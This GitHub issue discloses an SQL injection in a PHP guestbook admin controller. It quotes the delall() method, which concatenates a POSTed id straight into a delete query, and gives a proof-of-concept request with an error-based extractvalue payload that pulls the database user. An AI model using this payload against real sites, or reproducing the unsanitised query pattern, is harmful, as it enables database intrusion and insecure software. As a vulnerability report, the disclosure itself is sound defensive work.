Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

\App\Manage\Controller\GuestbookController.class.php has SQLinjection #7

Open
maoqingya opened this issue Nov 28, 2021 · 0 comments
Open

Comments

@maoqingya
Copy link

@maoqingya maoqingya commented Nov 28, 2021

\App\Manage\Controller\GuestbookController.class.php

line:
188-219
public function delall(){
//dump($_POST);
//exit;
$m=D('Guestbook'); //数据库表,配置文件中定义了表前缀,这里则不需要写
$id = I('post.id');
//dump($id);
//exit;
if ($id==null){
$this->error('请选择删除项!');
}
//判断id是数组还是一个数值
if(is_array($id)){
$where = 'id in('.implode(',',$id).')';
//implode() 函数返回一个由数组元素组合成的字符串
}else{
$where = 'id='.$id;
}
//dump($where);
//exit;
$count=$m->where($where)->delete(); //修改表单用save函数
if ($count>0){
$this->success("成功删除{$count}条!");
}
else {
$this->error('批量删除失败!');
}

}

}

This's SQLinjection
POC:
http://127.0.0.1/index.php/Guestbook/Index/delal

POST:id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
1 participant